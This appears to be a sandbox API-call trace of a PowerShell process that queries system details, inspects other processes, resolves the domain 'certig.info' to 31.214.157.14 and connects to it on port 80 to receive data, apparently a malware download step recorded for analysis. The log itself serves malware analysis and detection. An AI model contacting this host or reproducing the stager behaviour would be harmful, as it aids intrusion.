	[0153.111] CoTaskMemFree (pv=0x1b7c8fa0) 
	[0153.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c80cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0153.112] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.112] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80cd08 | out: TokenHandle=0x1c80cd08*=0x378) returned 1
	[0153.113] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.113] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80cd08 | out: TokenHandle=0x1c80cd08*=0x350) returned 1
	[0153.116] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.116] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80caa8 | out: TokenHandle=0x1c80caa8*=0x374) returned 1
	[0153.117] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c80cb50 | out: lpFileInformation=0x1c80cb50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0153.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c80c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0153.119] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c80cb00 | out: lpFileInformation=0x1c80cb00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0153.120] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.120] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80cd08 | out: TokenHandle=0x1c80cd08*=0x37c) returned 1
	[0153.121] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.121] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80cd08 | out: TokenHandle=0x1c80cd08*=0x380) returned 1
	[0153.253] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.253] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80c988 | out: TokenHandle=0x1c80c988*=0x384) returned 1
	[0153.551] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.551] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80c988 | out: TokenHandle=0x1c80c988*=0x3bc) returned 1
	[0153.582] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c80d0a8 | out: lpWSAData=0x1c80d0a8) returned 0
	[0153.693] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c80c1c8 | out: phkResult=0x1c80c1c8*=0x398) returned 0x0
	[0153.693] RegQueryValueExW (in: hKey=0x398, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c80c14c, lpData=0x0, lpcbData=0x1c80c148*=0x0 | out: lpType=0x1c80c14c*=0x1, lpData=0x0, lpcbData=0x1c80c148*=0xe) returned 0x0
	[0153.693] CoTaskMemAlloc (cb=0x12) returned 0x1b7f7210
	[0153.693] RegQueryValueExW (in: hKey=0x398, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c80c11c, lpData=0x1b7f7210, lpcbData=0x1c80c118*=0xe | out: lpType=0x1c80c11c*=0x1, lpData="Client", lpcbData=0x1c80c118*=0xe) returned 0x0
	[0153.694] CoTaskMemFree (pv=0x1b7f7210) 
	[0153.694] RegCloseKey (hKey=0x398) returned 0x0
	[0153.698] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3a8
	[0153.704] setsockopt (s=0x3a8, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0153.704] closesocket (s=0x3a8) returned 0
	[0153.704] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3a8
	[0153.706] setsockopt (s=0x3a8, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0153.706] closesocket (s=0x3a8) returned 0
	[0153.714] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.714] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80c928 | out: TokenHandle=0x1c80c928*=0x3a8) returned 1
	[0153.822] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.822] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80c928 | out: TokenHandle=0x1c80c928*=0x3cc) returned 1
	[0153.850] GetCurrentProcessId () returned 0xaa0
	[0153.994] CoTaskMemAlloc (cb=0x204) returned 0x19f4e0
	[0153.994] GetComputerNameW (in: lpBuffer=0x19f4e0, nSize=0x2fd3ff0 | out: lpBuffer="XDUWTFONO", nSize=0x2fd3ff0) returned 1
	[0153.994] CoTaskMemFree (pv=0x19f4e0) 
	[0153.995] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c80ce08 | out: phkResult=0x1c80ce08*=0x3d0) returned 0x0
	[0153.995] RegQueryValueExW (in: hKey=0x3d0, lpValueName="Library", lpReserved=0x0, lpType=0x1c80cd8c, lpData=0x0, lpcbData=0x1c80cd88*=0x0 | out: lpType=0x1c80cd8c*=0x1, lpData=0x0, lpcbData=0x1c80cd88*=0x1c) returned 0x0
	[0153.995] CoTaskMemAlloc (cb=0x20) returned 0x1b7bc820
	[0153.995] RegQueryValueExW (in: hKey=0x3d0, lpValueName="Library", lpReserved=0x0, lpType=0x1c80cd5c, lpData=0x1b7bc820, lpcbData=0x1c80cd58*=0x1c | out: lpType=0x1c80cd5c*=0x1, lpData="netfxperf.dll", lpcbData=0x1c80cd58*=0x1c) returned 0x0
	[0153.995] CoTaskMemFree (pv=0x1b7bc820) 
	[0153.995] RegQueryValueExW (in: hKey=0x3d0, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c80cd8c, lpData=0x0, lpcbData=0x1c80cd88*=0x0 | out: lpType=0x1c80cd8c*=0x4, lpData=0x0, lpcbData=0x1c80cd88*=0x4) returned 0x0
	[0153.997] RegQueryValueExW (in: hKey=0x3d0, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c80cd90, lpData=0x1c80cd8c, lpcbData=0x1c80cd88*=0x4 | out: lpType=0x1c80cd90*=0x4, lpData=0x1c80cd8c*=0x1, lpcbData=0x1c80cd88*=0x4) returned 0x0
	[0153.997] RegQueryValueExW (in: hKey=0x3d0, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c80cd8c, lpData=0x0, lpcbData=0x1c80cd88*=0x0 | out: lpType=0x1c80cd8c*=0x4, lpData=0x0, lpcbData=0x1c80cd88*=0x4) returned 0x0
	[0153.997] RegQueryValueExW (in: hKey=0x3d0, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c80cd90, lpData=0x1c80cd8c, lpcbData=0x1c80cd88*=0x4 | out: lpType=0x1c80cd90*=0x4, lpData=0x1c80cd8c*=0x137a, lpcbData=0x1c80cd88*=0x4) returned 0x0
	[0153.997] RegCloseKey (hKey=0x3d0) returned 0x0
	[0154.001] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c80cdc8 | out: phkResult=0x1c80cdc8*=0x3d0) returned 0x0
	[0154.001] RegQueryValueExW (in: hKey=0x3d0, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c80cd4c, lpData=0x0, lpcbData=0x1c80cd48*=0x0 | out: lpType=0x1c80cd4c*=0x4, lpData=0x0, lpcbData=0x1c80cd48*=0x4) returned 0x0
	[0154.001] RegQueryValueExW (in: hKey=0x3d0, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c80cd50, lpData=0x1c80cd4c, lpcbData=0x1c80cd48*=0x4 | out: lpType=0x1c80cd50*=0x4, lpData=0x1c80cd4c*=0x3, lpcbData=0x1c80cd48*=0x4) returned 0x0
	[0154.001] RegQueryValueExW (in: hKey=0x3d0, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c80cd4c, lpData=0x0, lpcbData=0x1c80cd48*=0x0 | out: lpType=0x1c80cd4c*=0x4, lpData=0x0, lpcbData=0x1c80cd48*=0x4) returned 0x0
	[0154.001] RegQueryValueExW (in: hKey=0x3d0, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c80cd50, lpData=0x1c80cd4c, lpcbData=0x1c80cd48*=0x4 | out: lpType=0x1c80cd50*=0x4, lpData=0x1c80cd4c*=0x20000, lpcbData=0x1c80cd48*=0x4) returned 0x0
	[0154.001] RegQueryValueExW (in: hKey=0x3d0, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c80cd4c, lpData=0x0, lpcbData=0x1c80cd48*=0x0 | out: lpType=0x1c80cd4c*=0x3, lpData=0x0, lpcbData=0x1c80cd48*=0xaa) returned 0x0
	[0154.002] RegQueryValueExW (in: hKey=0x3d0, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c80cd4c, lpData=0x2fd72e0, lpcbData=0x1c80cd48*=0xaa | out: lpType=0x1c80cd4c*=0x3, lpData=0x2fd72e0*, lpcbData=0x1c80cd48*=0xaa) returned 0x0
	[0154.007] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0154.011] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c80cd00, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0154.012] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x3dc
	[0154.016] MapViewOfFile (hFileMappingObject=0x3dc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2ae0000
	[0154.016] VirtualQuery (in: lpAddress=0x2ae0000, lpBuffer=0x1c80ccf8, dwLength=0x30 | out: lpBuffer=0x1c80ccf8*(BaseAddress=0x2ae0000, AllocationBase=0x2ae0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0154.017] LocalFree (hMem=0x1b7c6290) returned 0x0
	[0154.017] RegCloseKey (hKey=0x3d0) returned 0x0
	[0154.020] GetVersionExW (in: lpVersionInformation=0x1c80bcd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c80bcd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0154.021] GetVersionExW (in: lpVersionInformation=0x1c80bca0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c80bca0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0154.022] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd7fb0, cbSid=0x1c80cce0 | out: pSid=0x2fd7fb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c80cce0) returned 1
	[0154.025] CreateMutexW (lpMutexAttributes=0x2fd81b8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d0
	[0154.028] WaitForSingleObject (hHandle=0x3d0, dwMilliseconds=0x1f4) returned 0x0
	[0154.030] GetCurrentProcessId () returned 0xaa0
	[0154.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaa0) returned 0x3e0
	[0154.032] GetProcessTimes (in: hProcess=0x3e0, lpCreationTime=0x1c80cbf0, lpExitTime=0x1c80cbe8, lpKernelTime=0x1c80cbe0, lpUserTime=0x1c80cbd8 | out: lpCreationTime=0x1c80cbf0, lpExitTime=0x1c80cbe8, lpKernelTime=0x1c80cbe0, lpUserTime=0x1c80cbd8) returned 1
	[0154.032] CloseHandle (hObject=0x3e0) returned 1
	[0154.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x808) returned 0x3e0
	[0154.032] GetProcessTimes (in: hProcess=0x3e0, lpCreationTime=0x1c80cc80, lpExitTime=0x1c80cc78, lpKernelTime=0x1c80cc70, lpUserTime=0x1c80cc68 | out: lpCreationTime=0x1c80cc80, lpExitTime=0x1c80cc78, lpKernelTime=0x1c80cc70, lpUserTime=0x1c80cc68) returned 1
	[0154.032] CloseHandle (hObject=0x3e0) returned 1
	[0154.033] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x808) returned 0x3e0
	[0154.034] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.034] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.035] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c80cbd8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c80cbd8*=0x3e4) returned 1
	[0154.139] CloseHandle (hObject=0x3e4) returned 1
	[0154.139] CloseHandle (hObject=0x3e0) returned 1
	[0154.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0x3e0
	[0154.139] GetProcessTimes (in: hProcess=0x3e0, lpCreationTime=0x1c80cc80, lpExitTime=0x1c80cc78, lpKernelTime=0x1c80cc70, lpUserTime=0x1c80cc68 | out: lpCreationTime=0x1c80cc80, lpExitTime=0x1c80cc78, lpKernelTime=0x1c80cc70, lpUserTime=0x1c80cc68) returned 1
	[0154.139] CloseHandle (hObject=0x3e0) returned 1
	[0154.139] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x8c4) returned 0x3e0
	[0154.140] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.140] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.140] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c80cbd8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c80cbd8*=0x3e4) returned 1
	[0154.140] CloseHandle (hObject=0x3e4) returned 1
	[0154.140] CloseHandle (hObject=0x3e0) returned 1
	[0154.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x3e0
	[0154.140] GetProcessTimes (in: hProcess=0x3e0, lpCreationTime=0x1c80cc80, lpExitTime=0x1c80cc78, lpKernelTime=0x1c80cc70, lpUserTime=0x1c80cc68 | out: lpCreationTime=0x1c80cc80, lpExitTime=0x1c80cc78, lpKernelTime=0x1c80cc70, lpUserTime=0x1c80cc68) returned 1
	[0154.141] CloseHandle (hObject=0x3e0) returned 1
	[0154.141] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x7cc) returned 0x3e0
	[0154.141] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.141] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.141] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c80cbd8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c80cbd8*=0x3e4) returned 1
	[0154.141] CloseHandle (hObject=0x3e4) returned 1
	[0154.141] CloseHandle (hObject=0x3e0) returned 1
	[0154.143] ReleaseMutex (hMutex=0x3d0) returned 1
	[0154.160] CloseHandle (hObject=0x3d0) returned 1
	[0154.161] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd9178, cbSid=0x1c80cce0 | out: pSid=0x2fd9178*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c80cce0) returned 1
	[0154.161] CreateMutexW (lpMutexAttributes=0x2fd9330, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0154.162] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3d0
	[0154.162] WaitForSingleObject (hHandle=0x3d0, dwMilliseconds=0x1f4) returned 0x0
	[0154.212] ReleaseMutex (hMutex=0x3d0) returned 1
	[0154.212] CloseHandle (hObject=0x3d0) returned 1
	[0154.213] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd9fc0, cbSid=0x1c80cce0 | out: pSid=0x2fd9fc0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c80cce0) returned 1
	[0154.213] CreateMutexW (lpMutexAttributes=0x2fda178, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0154.213] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3d0
	[0154.213] WaitForSingleObject (hHandle=0x3d0, dwMilliseconds=0x1f4) returned 0x0
	[0154.214] ReleaseMutex (hMutex=0x3d0) returned 1
	[0154.214] CloseHandle (hObject=0x3d0) returned 1
	[0154.215] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fdae18, cbSid=0x1c80cce0 | out: pSid=0x2fdae18*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c80cce0) returned 1
	[0154.215] CreateMutexW (lpMutexAttributes=0x2fdafd0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0154.215] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3d0
	[0154.215] WaitForSingleObject (hHandle=0x3d0, dwMilliseconds=0x1f4) returned 0x0
	[0154.216] ReleaseMutex (hMutex=0x3d0) returned 1
	[0154.216] CloseHandle (hObject=0x3d0) returned 1
	[0154.216] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fdbc68, cbSid=0x1c80cce0 | out: pSid=0x2fdbc68*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c80cce0) returned 1
	[0154.216] CreateMutexW (lpMutexAttributes=0x2fdbe20, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0154.216] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3d0
	[0154.217] WaitForSingleObject (hHandle=0x3d0, dwMilliseconds=0x1f4) returned 0x0
	[0154.217] ReleaseMutex (hMutex=0x3d0) returned 1
	[0154.218] CloseHandle (hObject=0x3d0) returned 1
	[0154.220] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fdcab8, cbSid=0x1c80cc90 | out: pSid=0x2fdcab8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c80cc90) returned 1
	[0154.221] CreateMutexW (lpMutexAttributes=0x2fdcc70, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0154.221] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3d0
	[0154.221] WaitForSingleObject (hHandle=0x3d0, dwMilliseconds=0x1f4) returned 0x0
	[0154.222] ReleaseMutex (hMutex=0x3d0) returned 1
	[0154.222] CloseHandle (hObject=0x3d0) returned 1
	[0154.223] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fdd8f8, cbSid=0x1c80cc90 | out: pSid=0x2fdd8f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c80cc90) returned 1
	[0154.223] CreateMutexW (lpMutexAttributes=0x2fddab0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0154.223] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3d0
	[0154.223] WaitForSingleObject (hHandle=0x3d0, dwMilliseconds=0x1f4) returned 0x0
	[0154.224] ReleaseMutex (hMutex=0x3d0) returned 1
	[0154.224] CloseHandle (hObject=0x3d0) returned 1
	[0154.225] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fde730, cbSid=0x1c80cc90 | out: pSid=0x2fde730*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c80cc90) returned 1
	[0154.225] CreateMutexW (lpMutexAttributes=0x2fde8e8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0154.225] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3d0
	[0154.225] WaitForSingleObject (hHandle=0x3d0, dwMilliseconds=0x1f4) returned 0x0
	[0154.226] ReleaseMutex (hMutex=0x3d0) returned 1
	[0154.226] CloseHandle (hObject=0x3d0) returned 1
	[0154.226] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fdf578, cbSid=0x1c80cc90 | out: pSid=0x2fdf578*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c80cc90) returned 1
	[0154.227] CreateMutexW (lpMutexAttributes=0x2fdf730, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0154.227] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3d0
	[0154.227] WaitForSingleObject (hHandle=0x3d0, dwMilliseconds=0x1f4) returned 0x0
	[0154.228] ReleaseMutex (hMutex=0x3d0) returned 1
	[0154.228] CloseHandle (hObject=0x3d0) returned 1
	[0154.228] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fe03b8, cbSid=0x1c80cc90 | out: pSid=0x2fe03b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c80cc90) returned 1
	[0154.228] CreateMutexW (lpMutexAttributes=0x2fe0570, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0154.228] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3d0
	[0154.228] WaitForSingleObject (hHandle=0x3d0, dwMilliseconds=0x1f4) returned 0x0
	[0154.229] ReleaseMutex (hMutex=0x3d0) returned 1
	[0154.229] CloseHandle (hObject=0x3d0) returned 1
	[0154.233] CoTaskMemAlloc (cb=0xd) returned 0x1b7f7070
	[0154.236] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x1c80d180*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c80d178 | out: ppResult=0x1c80d178*=0x1b801870*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x1b7f73b0*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0154.391] CoTaskMemFree (pv=0x1b7f7070) 
	[0154.391] CoTaskMemFree (pv=0x0) 
	[0154.392] FreeAddrInfoW (pAddrInfo=0x1b801870*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o.info", ai_addr=0x1b7f73b0*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0154.393] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x404
	[0154.394] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x408
	[0154.396] WSAConnect (in: s=0x404, name=0x2fe1158*(sa_family=2, sin_port=0x50, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0154.432] closesocket (s=0x408) returned 0
	[0155.220] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4e10
	[0155.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0155.220] CoTaskMemFree (pv=0x1b7a4e10) 
	[0157.014] recv (in: s=0x404, buf=0x303db58, len=502, flags=0 | out: buf=0x303db58*) returned 326
	[0158.380] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4e10
	[0158.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.381] CoTaskMemFree (pv=0x1b7a4e10) 
	[0158.539] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0158.640] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4e10
	[0158.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.641] CoTaskMemFree (pv=0x1b7a4e10) 
	[0158.725] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4e10
	[0158.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.725] CoTaskMemFree (pv=0x1b7a4e10) 
	[0158.911] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1d8
	[0158.916] CoGetObjectContext (in: riid=0x1c80cff8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cff0 | out: ppv=0x1c80cff0*=0x181868) returned 0x0
